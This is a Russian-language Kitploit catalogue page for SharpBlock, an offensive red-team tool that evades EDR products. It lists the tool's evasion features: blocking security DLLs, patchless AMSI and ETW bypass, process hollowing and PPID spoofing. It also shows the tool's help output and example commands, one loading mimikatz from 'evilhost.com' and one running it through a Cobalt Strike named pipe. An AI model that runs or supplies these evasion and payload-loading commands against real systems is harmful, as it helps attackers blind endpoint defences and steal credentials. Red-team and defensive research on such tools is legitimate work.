Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SharpBlock — Метод обхода активной защиты EDR, нацеленной на DLL, путем предотвращения выполнения точки входа. | Kitploit
Инструменты/GitHubGitHub/ccob/sharpblock
Red Teaming
GitHubccob/sharpblock

SharpBlock

Метод обхода активной защиты EDR, нацеленной на DLL, путем предотвращения выполнения точки входа.

Репозиторий
1.2k1655 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SharpBlock

Метод обхода активных DLL проецирования EDR путем предотвращения выполнения точки входа.

Возможности

  • Блокирует выполнение точки входа DLL EDR, что предотвращает установку хуков EDR.
  • Беспатчевый обход AMSI, не обнаруживаемый сканерами, ищущими исправления кода Amsi.dll во время выполнения.
  • Хост-процесс, заменяемый на имплант PE, который может быть загружен с диска, HTTP или именованного канала (Cobalt Strike)
  • Внедренный процесс скрыт, чтобы помочь обойти сканеры, ищущие полые процессы.
  • Аргументы командной строки подделываются и внедряются после создания процесса с использованием скрытного метода обнаружения EDR.
  • Беспатчевый обход ETW.
  • Блокирует вызов NtProtectVirtualMemory, когда вызываемый находится в пределах адресного пространства заблокированной DLL.
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Примеры

Запуск mimikatz через HTTP с использованием notepad в качестве хост-процесса, блокировка DLL SylantStrike

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Запуск mimikatz с использованием Cobalt Strike beacon через именованный канал с notepad в качестве хост-процесса, блокировка DLL SylantStrike

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Примечание: для команды beacon upload_file загрузите upload.cna в Script Manager Cobalt Strike

Сопровождающие статьи в блоге:

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
Скачать инструмент